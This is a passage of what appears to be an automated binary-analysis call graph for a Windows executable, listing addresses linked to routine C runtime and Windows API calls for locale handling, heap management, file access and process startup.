EnterCriticalSection 19228->19275 19231 7ff6a29d2643 19229->19231 19233 7ff6a29ca574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19229->19233 19231->19206 19236 7ff6a29d265b 19233->19236 19237 7ff6a29d26b2 19236->19237 19239 7ff6a29cb294 50 API calls 19236->19239 19237->19206 19240 7ff6a29d269c 19239->19240 19241 7ff6a29d2334 65 API calls 19240->19241 19241->19237 19243 7ff6a29c4fbc 45 API calls 19242->19243 19244 7ff6a29d2048 19243->19244 19245 7ff6a29d2054 GetOEMCP 19244->19245 19246 7ff6a29d2066 19244->19246 19248 7ff6a29d207b 19245->19248 19247 7ff6a29d206b GetACP 19246->19247 19246->19248 19247->19248 19248->19209 19248->19213 19250 7ff6a29d2034 47 API calls 19249->19250 19251 7ff6a29d2709 19250->19251 19252 7ff6a29d285f 19251->19252 19254 7ff6a29d2746 IsValidCodePage 19251->19254 19259 7ff6a29d2760 __scrt_get_show_window_mode 19251->19259 19253 7ff6a29bc5c0 _log10_special 8 API calls 19252->19253 19255 7ff6a29d24a1 19253->19255 19254->19252 19256 7ff6a29d2757 19254->19256 19255->19217 19255->19221 19257 7ff6a29d2786 GetCPInfo 19256->19257 19256->19259 19257->19252 19257->19259 19276 7ff6a29d214c 19259->19276 19342 7ff6a29d0348 EnterCriticalSection 19260->19342 19277 7ff6a29d2189 GetCPInfo 19276->19277 19278 7ff6a29d227f 19276->19278 19277->19278 19280 7ff6a29d219c 19277->19280 19279 7ff6a29bc5c0 _log10_special 8 API calls 19278->19279 19281 7ff6a29d231e 19279->19281 19282 7ff6a29d2eb0 48 API calls 19280->19282 19281->19252 19283 7ff6a29d2213 19282->19283 19287 7ff6a29d7bf4 19283->19287 19286 7ff6a29d7bf4 54 API calls 19286->19278 19288 7ff6a29c4fbc 45 API calls 19287->19288 19289 7ff6a29d7c19 19288->19289 19292 7ff6a29d78c0 19289->19292 19293 7ff6a29d7901 19292->19293 19294 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19293->19294 19295 7ff6a29d794b 19294->19295 19297 7ff6a29d7a81 19295->19297 19299 7ff6a29d7bc9 19295->19299 19300 7ff6a29cd66c _fread_nolock 12 API calls 19295->19300 19302 7ff6a29d7983 19295->19302 19296 7ff6a29bc5c0 _log10_special 8 API calls 19298 7ff6a29d2246 19296->19298 19297->19299 19301 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19297->19301 19298->19286 19299->19296 19300->19302 19301->19299 19302->19297 19303 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19302->19303 19304 7ff6a29d79f6 19303->19304 19304->19297 19323 7ff6a29cf154 19304->19323 19307 7ff6a29d7a92 19309 7ff6a29cd66c _fread_nolock 12 API calls 19307->19309 19311 7ff6a29d7b64 19307->19311 19313 7ff6a29d7ab0 19307->19313 19308 7ff6a29d7a41 19308->19297 19310 7ff6a29cf154 __crtLCMapStringW 6 API calls 19308->19310 19309->19313 19310->19297 19311->19297 19312 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19311->19312 19312->19297 19313->19297 19314 7ff6a29cf154 __crtLCMapStringW 6 API calls 19313->19314 19315 7ff6a29d7b30 19314->19315 19315->19311 19316 7ff6a29d7b50 19315->19316 19317 7ff6a29d7b66 19315->19317 19318 7ff6a29d0858 WideCharToMultiByte 19316->19318 19319 7ff6a29d0858 WideCharToMultiByte 19317->19319 19320 7ff6a29d7b5e 19318->19320 19319->19320 19320->19311 19321 7ff6a29d7b7e 19320->19321 19321->19297 19322 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19321->19322 19322->19297 19329 7ff6a29ced80 19323->19329 19326 7ff6a29cf19a 19326->19297 19326->19307 19326->19308 19328 7ff6a29cf203 LCMapStringW 19328->19326 19330 7ff6a29ceddd 19329->19330 19337 7ff6a29cedd8 __vcrt_FlsAlloc 19329->19337 19330->19326 19339 7ff6a29cf240 19330->19339 19331 7ff6a29cee0d LoadLibraryExW 19332 7ff6a29ceee2 19331->19332 19333 7ff6a29cee32 GetLastError 19331->19333 19334 7ff6a29cef02 GetProcAddress 19332->19334 19335 7ff6a29ceef9 FreeLibrary 19332->19335 19333->19337 19334->19330 19336 7ff6a29cef13 19334->19336 19335->19334 19336->19330 19337->19330 19337->19331 19337->19334 19338 7ff6a29cee6c LoadLibraryExW 19337->19338 19338->19332 19338->19337 19340 7ff6a29ced80 __crtLCMapStringW 5 API calls 19339->19340 19341 7ff6a29cf26e __crtLCMapStringW 19340->19341 19341->19328 19344 7ff6a29c951d 19343->19344 19345 7ff6a29c93b9 19343->19345 19346 7ff6a29c9546 19344->19346 19347 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19344->19347 19345->19177 19348 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19346->19348 19347->19344 19348->19345 19350 7ff6a29d6331 19349->19350 19351 7ff6a29d6348 19349->19351 19352 7ff6a29c4f78 _get_daylight 11 API calls 19350->19352 19351->19350 19354 7ff6a29d6356 19351->19354 19353 7ff6a29d6336 19352->19353 19355 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19353->19355 19356 7ff6a29c4fbc 45 API calls 19354->19356 19357 7ff6a29d6341 19354->19357 19355->19357 19356->19357 19357->19018 19359 7ff6a29c4fbc 45 API calls 19358->19359 19360 7ff6a29d8fe1 19359->19360 19363 7ff6a29d8c38 19360->19363 19365 7ff6a29d8c86 19363->19365 19364 7ff6a29bc5c0 _log10_special 8 API calls 19366 7ff6a29d7275 19364->19366 19367 7ff6a29d8d0d 19365->19367 19369 7ff6a29d8cf8 GetCPInfo 19365->19369 19372 7ff6a29d8d11 19365->19372 19366->19018 19366->19042 19368 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19367->19368 19367->19372 19370 7ff6a29d8da5 19368->19370 19369->19367 19369->19372 19371 7ff6a29cd66c _fread_nolock 12 API calls 19370->19371 19370->19372 19373 7ff6a29d8ddc 19370->19373 19371->19373 19372->19364 19373->19372 19374 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19373->19374 19375 7ff6a29d8e4a 19374->19375 19376 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19375->19376 19385 7ff6a29d8f2c 19375->19385 19378 7ff6a29d8e70 19376->19378 19377 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19377->19372 19379 7ff6a29cd66c _fread_nolock 12 API calls 19378->19379 19380 7ff6a29d8e9d 19378->19380 19378->19385 19379->19380 19381 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19380->19381 19380->19385 19382 7ff6a29d8f14 19381->19382 19383 7ff6a29d8f34 19382->19383 19384 7ff6a29d8f1a 19382->19384 19392 7ff6a29cefd8 19383->19392 19384->19385 19387 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19384->19387 19385->19372 19385->19377 19387->19385 19389 7ff6a29d8f73 19389->19372 19391 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19389->19391 19390 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19390->19389 19391->19372 19393 7ff6a29ced80 __crtLCMapStringW 5 API calls 19392->19393 19394 7ff6a29cf016 19393->19394 19395 7ff6a29cf01e 19394->19395 19396 7ff6a29cf240 __crtLCMapStringW 5 API calls 19394->19396 19395->19389 19395->19390 19397 7ff6a29cf087 CompareStringW 19396->19397 19397->19395 19399 7ff6a29d7cb1 19398->19399 19400 7ff6a29d7cca HeapSize 19398->19400 19401 7ff6a29c4f78 _get_daylight 11 API calls 19399->19401 19402 7ff6a29d7cb6 19401->19402 19403 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19402->19403 19404 7ff6a29d7cc1 19403->19404 19404->19046 19406 7ff6a29d7d03 19405->19406 19407 7ff6a29d7cf9 19405->19407 19409 7ff6a29d7d08 19406->19409 19415 7ff6a29d7d0f _get_daylight 19406->19415 19408 7ff6a29cd66c _fread_nolock 12 API calls 19407->19408 19413 7ff6a29d7d01 19408->19413 19412 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19409->19412 19410 7ff6a29d7d42 HeapReAlloc 19410->19413 19410->19415 19411 7ff6a29d7d15 19414 7ff6a29c4f78 _get_daylight 11 API calls 19411->19414 19412->19413 19413->19051 19414->19413 19415->19410 19415->19411 19416 7ff6a29d3600 _get_daylight 2 API calls 19415->19416 19416->19415 19418 7ff6a29ced80 __crtLCMapStringW 5 API calls 19417->19418 19419 7ff6a29cefb4 19418->19419 19419->19055 19421 7ff6a29c556a 19420->19421 19423 7ff6a29c5546 19420->19423 19422 7ff6a29c55c4 19421->19422 19425 7ff6a29c556f 19421->19425 19426 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19422->19426 19424 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19423->19424 19441 7ff6a29c5555 19423->19441 19424->19441 19427 7ff6a29c5584 19425->19427 19429 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19425->19429 19425->19441 19435 7ff6a29c55e0 19426->19435 19430 7ff6a29cd66c _fread_nolock 12 API calls 19427->19430 19428 7ff6a29c55e7 GetLastError 19431 7ff6a29c4eec _fread_nolock 11 API calls 19428->19431 19429->19427 19430->19441 19433 7ff6a29c55f4 19431->19433 19432 7ff6a29c5622 19436 7ff6a29cf910 _fread_nolock MultiByteToWideChar 19432->19436 19432->19441 19438 7ff6a29c4f78 _get_daylight 11 API calls 19433->19438 19434 7ff6a29c5615 19440 7ff6a29cd66c _fread_nolock 12 API calls 19434->19440 19435->19428 19435->19432 19435->19434 19439 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19435->19439 19437 7ff6a29c5666 19436->19437 19437->19428 19437->19441 19438->19441 19439->19434 19440->19432 19441->19059 19441->19060 19443 7ff6a29c9295 19442->19443 19454 7ff6a29c9291 19442->19454 19463 7ff6a29d2aac GetEnvironmentStringsW 19443->19463 19446 7ff6a29c92a2 19448 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19446->19448 19447 7ff6a29c92ae 19470 7ff6a29c93fc 19447->19470 19448->19454 19451 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19452 7ff6a29c92d5 19451->19452 19453 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19452->19453 19453->19454 19454->19087 19455 7ff6a29c963c 19454->19455 19456 7ff6a29c965f 19455->19456 19461 7ff6a29c9676 19455->19461 19456->19087 19457 7ff6a29cf910 MultiByteToWideChar _fread_nolock 19457->19461 19458 7ff6a29cec08 _get_daylight 11 API calls 19458->19461 19459 7ff6a29c96ea 19460 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19459->19460 19460->19456 19461->19456 19461->19457 19461->19458 19461->19459 19462 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19461->19462 19462->19461 19464 7ff6a29c929a 19463->19464 19465 7ff6a29d2ad0 19463->19465 19464->19446 19464->19447 19466 7ff6a29cd66c _fread_nolock 12 API calls 19465->19466 19469 7ff6a29d2b07 memcpy_s 19466->19469 19467 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19468 7ff6a29d2b27 FreeEnvironmentStringsW 19467->19468 19468->19464 19469->19467 19471 7ff6a29c9424 19470->19471 19472 7ff6a29cec08 _get_daylight 11 API calls 19471->19472 19485 7ff6a29c945f 19472->19485 19473 7ff6a29c9467 19474 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19473->19474 19476 7ff6a29c92b6 19474->19476 19475 7ff6a29c94e1 19477 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19475->19477 19476->19451 19477->19476 19478 7ff6a29cec08 _get_daylight 11 API calls 19478->19485 19479 7ff6a29c94d0 19481 7ff6a29c9518 11 API calls 19479->19481 19480 7ff6a29d04e4 37 API calls 19480->19485 19482 7ff6a29c94d8 19481->19482 19483 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19482->19483 19483->19473 19484 7ff6a29c9504 19486 7ff6a29ca970 _isindst 17 API calls 19484->19486 19485->19473 19485->19475 19485->19478 19485->19479 19485->19480 19485->19484 19487 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19485->19487 19488 7ff6a29c9516 19486->19488 19487->19485 19491 7ff6a29d8ba1 __crtLCMapStringW 19489->19491 19490 7ff6a29d715e 19490->19114 19490->19115 19491->19490 19492 7ff6a29cefd8 6 API calls 19491->19492 19492->19490 20498 7ff6a29dac53 20499 7ff6a29dac63 20498->20499 20502 7ff6a29c54e8 LeaveCriticalSection 20499->20502 15918 7ff6a29bbb50 15919 7ff6a29bbb7e 15918->15919 15920 7ff6a29bbb65 15918->15920 15920->15919 15923 7ff6a29cd66c 15920->15923 15924 7ff6a29cd67b _get_daylight 15923->15924 15925 7ff6a29cd6b7 15923->15925 15924->15925 15926 7ff6a29cd69e HeapAlloc 15924->15926 15930 7ff6a29d3600 15924->15930 15933 7ff6a29c4f78 15925->15933 15926->15924 15928 7ff6a29bbbde 15926->15928 15936 7ff6a29d3640 15930->15936 15942 7ff6a29cb338 GetLastError 15933->15942 15935 7ff6a29c4f81 15935->15928 15941 7ff6a29d0348 EnterCriticalSection 15936->15941 15943 7ff6a29cb379 FlsSetValue 15942->15943 15947 7ff6a29cb35c 15942->15947 15944 7ff6a29cb38b 15943->15944 15956 7ff6a29cb369 SetLastError 15943->15956 15959 7ff6a29cec08 15944->15959 15947->15943 15947->15956 15949 7ff6a29cb3b8 FlsSetValue 15952 7ff6a29cb3c4 FlsSetValue 15949->15952 15953 7ff6a29cb3d6 15949->15953 15950 7ff6a29cb3a8 FlsSetValue 15951 7ff6a29cb3b1 15950->15951 15966 7ff6a29ca9b8 15951->15966 15952->15951 15972 7ff6a29caf64 15953->15972 15956->15935 15965 7ff6a29cec19 _get_daylight 15959->15965 15960 7ff6a29cec6a 15962 7ff6a29c4f78 _get_daylight 10 API calls 15960->15962 15961 7ff6a29cec4e HeapAlloc 15963 7ff6a29cb39a 15961->15963 15961->15965 15962->15963 15963->15949 15963->15950 15964 7ff6a29d3600 _get_daylight 2 API calls 15964->15965 15965->15960 15965->15961 15965->15964 15967 7ff6a29ca9ec 15966->15967 15968 7ff6a29ca9bd RtlFreeHeap 15966->15968 15967->15956 15968->15967 15969 7ff6a29ca9d8 GetLastError 15968->15969 15970 7ff6a29ca9e5 Concurrency::details::SchedulerProxy::DeleteThis 15969->15970 15971 7ff6a29c4f78 _get_daylight 9 API calls 15970->15971 15971->15967 15977 7ff6a29cae3c 15972->15977 15989 7ff6a29d0348 EnterCriticalSection 15977->15989 15991 7ff6a29c99d1 16003 7ff6a29ca448 15991->16003 16008 7ff6a29cb1c0 GetLastError 16003->16008 16009 7ff6a29cb1e4 FlsGetValue 16008->16009 16010 7ff6a29cb201 FlsSetValue 16008->16010 16011 7ff6a29cb1fb 16009->16011 16027 7ff6a29cb1f1 16009->16027 16012 7ff6a29cb213 16010->16012 16010->16027 16011->16010 16014 7ff6a29cec08 _get_daylight 11 API calls 16012->16014 16013 7ff6a29cb26d SetLastError 16015 7ff6a29ca451 16013->16015 16016 7ff6a29cb28d 16013->16016 16017 7ff6a29cb222 16014->16017 16030 7ff6a29ca574 16015->16030 16018 7ff6a29ca574 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16016->16018 16019 7ff6a29cb240 FlsSetValue 16017->16019 16020 7ff6a29cb230 FlsSetValue 16017->16020 16023 7ff6a29cb292 16018->16023 16021 7ff6a29cb25e 16019->16021 16022 7ff6a29cb24c FlsSetValue 16019->16022 16024 7ff6a29cb239 16020->16024 16025 7ff6a29caf64 _get_daylight 11 API calls 16021->16025 16022->16024 16026 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16024->16026 16028 7ff6a29cb266 16025->16028 16026->16027 16027->16013 16029 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16028->16029 16029->16013 16039 7ff6a29d36c0 16030->16039 16073 7ff6a29d3678 16039->16073 16078 7ff6a29d0348 EnterCriticalSection 16073->16078 20098 7ff6a29d1720 20109 7ff6a29d7454 20098->20109 20110 7ff6a29d7461 20109->20110 20111 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20110->20111 20112 7ff6a29d747d 20110->20112 20111->20110 20113 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20112->20113 20114 7ff6a29d1729 20112->20114 20113->20112 20115 7ff6a29d0348 EnterCriticalSection 20114->20115 16143 7ff6a29c5698 16144 7ff6a29c56cf 16143->16144 16145 7ff6a29c56b2 16143->16145 16144->16145 16146 7ff6a29c56e2 CreateFileW 16144->16146 16168 7ff6a29c4f58 16145->16168 16148 7ff6a29c5716 16146->16148 16149 7ff6a29c574c 16146->16149 16171 7ff6a29c57ec GetFileType 16148->16171 16197 7ff6a29c5c74 16149->16197 16153 7ff6a29c4f78 _get_daylight 11 API calls 16154 7ff6a29c56bf 16153->16154 16157 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 16154->16157 16163 7ff6a29c56ca 16157->16163 16158 7ff6a29c5741 CloseHandle 16158->16163 16159 7ff6a29c572b CloseHandle 16159->16163 16160 7ff6a29c5780 16223 7ff6a29c5a34 16160->16223 16161 7ff6a29c5755 16218 7ff6a29c4eec 16161->16218 16167 7ff6a29c575f 16167->16163 16169 7ff6a29cb338 _get_daylight 11 API calls 16168->16169 16170 7ff6a29c4f61 16169->16170 16170->16153 16172 7ff6a29c58f7 16171->16172 16175 7ff6a29c583a 16171->16175 16173 7ff6a29c5921 16172->16173 16174 7ff6a29c58ff 16172->16174 16180 7ff6a29c58e2 16173->16180 16181 7ff6a29c5944 PeekNamedPipe 16173->16181 16177 7ff6a29c5903 16174->16177 16178 7ff6a29c5912 GetLastError 16174->16178 16176 7ff6a29c5866 GetFileInformationByHandle 16175->16176 16182 7ff6a29c5b70 21 API calls 16175->16182 16176->16178 16179 7ff6a29c588f 16176->16179 16184 7ff6a29c4f78 _get_daylight 11 API calls 16177->16184 16186 7ff6a29c4eec _fread_nolock 11 API calls 16178->16186 16185 7ff6a29c5a34 51 API calls 16179->16185 16188 7ff6a29bc5c0 _log10_special 8 API calls 16180->16188 16181->16180 16183 7ff6a29c5854 16182->16183 16183->16176 16183->16180 16184->16180 16187 7ff6a29c589a 16185->16187 16186->16180 16240 7ff6a29c5994 16187->16240 16189 7ff6a29c5724 16188->16189 16189->16158 16189->16159 16192 7ff6a29c5994 10 API calls 16193 7ff6a29c58b9 16192->16193 16194 7ff6a29c5994 10 API calls 16193->16194 16195 7ff6a29c58ca 16194->16195 16195->16180 16196 7ff6a29c4f78 _get_daylight 11 API calls 16195->16196 16196->16180 16198 7ff6a29c5caa 16197->16198 16199 7ff6a29c4f78 _get_daylight 11 API calls 16198->16199 16217 7ff6a29c5d42 __vcrt_freefls 16198->16217 16201 7ff6a29c5cbc 16199->16201 16200 7ff6a29bc5c0 _log10_special 8 API calls 16202 7ff6a29c5751 16200->16202 16203 7ff6a29c4f78 _get_daylight 11 API calls 16201->16203 16202->16160 16202->16161 16204 7ff6a29c5cc4 16203->16204 16247 7ff6a29c7e78 16204->16247 16206 7ff6a29c5cd9 16207 7ff6a29c5ce1 16206->16207 16208 7ff6a29c5ceb 16206->16208 16209 7ff6a29c4f78 _get_daylight 11 API calls 16207->16209 16210 7ff6a29c4f78 _get_daylight 11 API calls 16208->16210 16213 7ff6a29c5ce6 16209->16213 16211 7ff6a29c5cf0 16210->16211 16212 7ff6a29c4f78 _get_daylight 11 API calls 16211->16212 16211->16217 16214 7ff6a29c5cfa 16212->16214 16215 7ff6a29c5d34 GetDriveTypeW 16213->16215 16213->16217 16216 7ff6a29c7e78 45 API calls 16214->16216 16215->16217 16216->16213 16217->16200 16219 7ff6a29cb338 _get_daylight 11 API calls 16218->16219 16220 7ff6a29c4ef9 Concurrency::details::SchedulerProxy::DeleteThis 16219->16220 16221 7ff6a29cb338 _get_daylight 11 API calls 16220->16221 16222 7ff6a29c4f1b 16221->16222 16222->16167 16225 7ff6a29c5a5c 16223->16225 16224 7ff6a29c578d 16233 7ff6a29c5b70 16224->16233 16225->16224 16341 7ff6a29cf794 16225->16341 16227 7ff6a29c5af0 16227->16224 16228 7ff6a29cf794 51 API calls 16227->16228 16229 7ff6a29c5b03 16228->16229 16229->16224 16230 7ff6a29cf794 51 API calls 16229->16230 16231 7ff6a29c5b16 16230->16231 16231->16224 16232 7ff6a29cf794 51 API calls 16231->16232 16232->16224 16234 7ff6a29c5b8a 16233->16234 16235 7ff6a29c5bc1 16234->16235 16236 7ff6a29c5b9a 16234->16236 16238 7ff6a29cf628 21 API calls 16235->16238 16237 7ff6a29c5baa 16236->16237 16239 7ff6a29c4eec _fread_nolock 11 API calls 16236->16239 16237->16167 16238->16237 16239->16237 16241 7ff6a29c59b0 16240->16241 16242 7ff6a29c59bd FileTimeToSystemTime 16240->16242 16241->16242 16245 7ff6a29c59b8 16241->16245 16243 7ff6a29c59d1 SystemTimeToTzSpecificLocalTime 16242->16243 16242->16245 16243->16245 16244 7ff6a29bc5c0 _log10_special 8 API calls 16246 7ff6a29c58a9 16244->16246 16245->16244 16246->16192 16248 7ff6a29c7e94 16247->16248 16249 7ff6a29c7f02 16247->16249 16248->16249 16251 7ff6a29c7e99 16248->16251 16284 7ff6a29d0830 16249->16284 16252 7ff6a29c7eb1 16251->16252 16253 7ff6a29c7ece 16251->16253 16259 7ff6a29c7c48 GetFullPathNameW 16252->16259 16267 7ff6a29c7cbc GetFullPathNameW 16253->16267 16258 7ff6a29c7ec6 __vcrt_freefls 16258->16206 16260 7ff6a29c7c6e GetLastError 16259->16260 16264 7ff6a29c7c84 16259->16264 16261 7ff6a29c4eec _fread_nolock 11 API calls 16260->16261 16262 7ff6a29c7c7b 16261->16262 16265 7ff6a29c4f78 _get_daylight 11 API calls 16262->16265 16263 7ff6a29c7c80 16263->16258 16264->16263 16266 7ff6a29c4f78 _get_daylight 11 API calls 16264->16266 16265->16263 16266->16263 16268 7ff6a29c7cef GetLastError 16267->16268 16272 7ff6a29c7d05 __vcrt_freefls 16267->16272 16269 7ff6a29c4eec _fread_nolock 11 API calls 16268->16269 16270 7ff6a29c7cfc 16269->16270 16271 7ff6a29c4f78 _get_daylight 11 API calls 16270->16271 16273 7ff6a29c7d01 16271->16273 16272->16273 16274 7ff6a29c7d5f GetFullPathNameW 16272->16274 16275 7ff6a29c7d94 16273->16275 16274->16268 16274->16273 16278 7ff6a29c7e08 memcpy_s 16275->16278 16280 7ff6a29c7dbd __scrt_get_show_window_mode 16275->16280 16276 7ff6a29c7df1 16277 7ff6a29c4f78 _get_daylight 11 API calls 16276->16277 16279 7ff6a29c7df6 16277->16279 16278->16258 16282 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 16279->16282 16280->16276 16280->16278 16281 7ff6a29c7e2a 16280->16281 16281->16278 16283 7ff6a29c4f78 _get_daylight 11 API calls 16281->16283 16282->16278 16283->16279 16287 7ff6a29d0640 16284->16287 16288 7ff6a29d0682 16287->16288 16289 7ff6a29d066b 16287->16289 16290 7ff6a29d0686 16288->16290 16291 7ff6a29d06a7 16288->16291 16292 7ff6a29c4f78 _get_daylight 11 API calls 16289->16292 16313 7ff6a29d07ac 16290->16313 16325 7ff6a29cf628 16291->16325 16295 7ff6a29d0670 16292->16295 16299 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 16295->16299 16297 7ff6a29d06ac 16301 7ff6a29d0751 16297->16301 16308 7ff6a29d06d3 16297->16308 16298 7ff6a29d068f 16300 7ff6a29c4f58 _fread_nolock 11 API calls 16298->16300 16312 7ff6a29d067b __vcrt_freefls 16299->16312 16302 7ff6a29d0694 16300->16302 16301->16289 16303 7ff6a29d0759 16301->16303 16305 7ff6a29c4f78 _get_daylight 11 API calls 16302->16305 16306 7ff6a29c7c48 13 API calls 16303->16306 16304 7ff6a29bc5c0 _log10_special 8 API calls 16307 7ff6a29d07a1 16304->16307 16305->16295 16306->16312 16307->16258 16309 7ff6a29c7cbc 14 API calls 16308->16309 16310 7ff6a29d0717 16309->16310 16311 7ff6a29c7d94 37 API calls 16310->16311 16310->16312 16311->16312 16312->16304 16314 7ff6a29d07f6 16313->16314 16315 7ff6a29d07c6 16313->16315 16316 7ff6a29d0801 GetDriveTypeW 16314->16316 16317 7ff6a29d07e1 16314->16317 16318 7ff6a29c4f58 _fread_nolock 11 API calls 16315->16318 16316->16317 16320 7ff6a29bc5c0 _log10_special 8 API calls 16317->16320 16319 7ff6a29d07cb 16318->16319 16321 7ff6a29c4f78 _get_daylight 11 API calls 16319->16321 16323 7ff6a29d068b 16320->16323 16322 7ff6a29d07d6 16321->16322 16324 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 16322->16324 16323->16297 16323->16298 16324->16317 16339 7ff6a29da540 16325->16339 16328 7ff6a29cf675 16331 7ff6a29bc5c0 _log10_special 8 API calls 16328->16331 16329 7ff6a29cf69c 16330 7ff6a29cec08 _get_daylight 11 API calls 16329->16330 16332 7ff6a29cf6ab 16330->16332 16333 7ff6a29cf709 16331->16333 16334 7ff6a29cf6c4 16332->16334 16335 7ff6a29cf6b5 GetCurrentDirectoryW 16332->16335 16333->16297 16337 7ff6a29c4f78 _get_daylight 11 API calls 16334->16337 16335->16334 16336 7ff6a29cf6c9 16335->16336 16338 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16336->16338 16337->16336 16338->16328 16340 7ff6a29cf65e GetCurrentDirectoryW 16339->16340 16340->16328 16340->16329 16342 7ff6a29cf7c5 16341->16342 16343 7ff6a29cf7a1 16341->16343 16345 7ff6a29cf7ff 16342->16345 16348 7ff6a29cf81e 16342->16348 16343->16342 16344 7ff6a29cf7a6 16343->16344 16346 7ff6a29c4f78 _get_daylight 11 API calls 16344->16346 16347 7ff6a29c4f78 _get_daylight 11 API calls 16345->16347 16349 7ff6a29cf7ab 16346->16349 16350 7ff6a29cf804 16347->16350 16358 7ff6a29c4fbc 16348->16358 16352 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 16349->16352 16353 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 16350->16353 16354 7ff6a29cf7b6 16352->16354 16356 7ff6a29cf80f 16353->16356 16354->16227 16355 7ff6a29d054c 51 API calls 16357 7ff6a29cf82b 16355->16357 16356->16227 16357->16355 16357->16356 16359 7ff6a29c4fe0 16358->16359 16361 7ff6a29c4fdb 16358->16361 16360 7ff6a29cb1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16359->16360 16359->16361 16362 7ff6a29c4ffb 16360->16362 16361->16357 16366 7ff6a29cd9f4 16362->16366 16367 7ff6a29c501e 16366->16367 16368 7ff6a29cda09 16366->16368 16370 7ff6a29cda60 16367->16370 16368->16367 16374 7ff6a29d3374 16368->16374 16371 7ff6a29cda75 16370->16371 16372 7ff6a29cda88 16370->16372 16371->16372 16387 7ff6a29d26c0 16371->16387 16372->16361 16375 7ff6a29cb1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16374->16375 16376 7ff6a29d3383 16375->16376 16377 7ff6a29d33ce 16376->16377 16386 7ff6a29d0348 EnterCriticalSection 16376->16386 16377->16367 16388 7ff6a29cb1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16387->16388 16389 7ff6a29d26c9 16388->16389 16390 7ff6a29bccac 16411 7ff6a29bce7c 16390->16411 16393 7ff6a29bcdf8 16565 7ff6a29bd19c IsProcessorFeaturePresent 16393->16565 16394 7ff6a29bccc8 __scrt_acquire_startup_lock 16396 7ff6a29bce02 16394->16396 16401 7ff6a29bcce6 __scrt_release_startup_lock 16394->16401 16397 7ff6a29bd19c 7 API calls 16396->16397 16399 7ff6a29bce0d __FrameHandler3::FrameUnwindToEmptyState 16397->16399 16398 7ff6a29bcd0b 16400 7ff6a29bcd91 16417 7ff6a29bd2e4 16400->16417 16401->16398 16401->16400 16554 7ff6a29c9b9c 16401->16554 16403 7ff6a29bcd96 16420 7ff6a29b1000 16403->16420 16408 7ff6a29bcdb9 16408->16399 16561 7ff6a29bd000 16408->16561 16412 7ff6a29bce84 16411->16412 16413 7ff6a29bce90 __scrt_dllmain_crt_thread_attach 16412->16413 16414 7ff6a29bccc0 16413->16414 16415 7ff6a29bce9d 16413->16415 16414->16393 16414->16394 16415->16414 16572 7ff6a29bd8f8 16415->16572 16418 7ff6a29da540 __scrt_get_show_window_mode 16417->16418 16419 7ff6a29bd2fb GetStartupInfoW 16418->16419 16419->16403 16421 7ff6a29b1009 16420->16421 16599 7ff6a29c54f4 16421->16599 16423 7ff6a29b37fb 16606 7ff6a29b36b0 16423->16606 16427 7ff6a29bc5c0 _log10_special 8 API calls 16429 7ff6a29b3ca7 16427->16429 16559 7ff6a29bd328 GetModuleHandleW 16429->16559 16430 7ff6a29b383c 16773 7ff6a29b1c80 16430->16773 16431 7ff6a29b391b 16782 7ff6a29b45b0 16431->16782 16434 7ff6a29b385b 16678 7ff6a29b8a20 16434->16678 16437 7ff6a29b396a 16805 7ff6a29b2710 16437->16805 16438 7ff6a29b388e 16447 7ff6a29b38bb __vcrt_freefls 16438->16447 16777 7ff6a29b8b90 16438->16777 16441 7ff6a29b395d 16442 